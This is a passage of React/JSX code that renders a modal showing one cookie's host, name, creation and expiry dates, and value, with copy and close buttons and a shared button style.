            display: 'flex', alignItems: 'center', justifyContent: 'center', padding: 20,
          }}>
            <div onClick={(e) => e.stopPropagation()} style={{
              background: 'var(--surface, #15151f)', border: '1px solid var(--border)',
              borderRadius: 8, width: 'min(720px, 100%)', maxHeight: '85vh',
              display: 'flex', flexDirection: 'column', overflow: 'hidden',
            }}>
              <div style={{ padding: '14px 18px', borderBottom: '1px solid var(--border)',
                display: 'grid', gridTemplateColumns: 'auto 1fr', gap: '4px 16px',
                fontSize: 12, fontFamily: 'monospace' }}>
                <span style={{ color: 'var(--muted)' }}>Host</span>
                <span style={{ wordBreak: 'break-all' }}>{String(host)}</span>
                <span style={{ color: 'var(--muted)' }}>Name</span>
                <span style={{ wordBreak: 'break-all' }}>{String(name)}</span>
                <span style={{ color: 'var(--muted)' }}>Created</span>
                <span>{String(created)}</span>
                <span style={{ color: 'var(--muted)' }}>Expires</span>
                <span>{String(expires)}</span>
              </div>
              <div style={{ padding: '10px 18px', display: 'flex', alignItems: 'center', gap: 10,
                borderBottom: '1px solid var(--border)' }}>
                <span style={{ color: 'var(--muted)', fontSize: 12, fontWeight: 600 }}>VALUE</span>
                <button onClick={copy} style={{ ...btnStyle,
                  borderColor: copied ? '#4ade80' : 'var(--accent)',
                  color: copied ? '#4ade80' : 'var(--accent)' }}>
                  {copied ? '✓ Copied' : '📋 Copy'}
                </button>
                <span style={{ flex: 1 }} />
                <button onClick={() => setCookieModal(null)} style={btnStyle}>Close</button>
              </div>
              <pre style={{
                margin: 0, padding: '14px 18px', overflow: 'auto', flex: 1,
                fontSize: 12, fontFamily: 'monospace', color: 'var(--fg)',
                whiteSpace: 'pre-wrap', wordBreak: 'break-all',
                background: 'var(--bg, #0d0d18)',
              }}>
                {value || <span style={{ color: 'var(--muted)' }}>(empty)</span>}
              </pre>
            </div>
          </div>
        );
      })()}
    </div>
  );
}

const btnStyle = {
  padding: '6px 14px', background: 'transparent', border: '1px solid var(--border)',
  borderRadius: 6, color: 'var(--muted)', cursor: 'pointer', fontSize: 13,
};
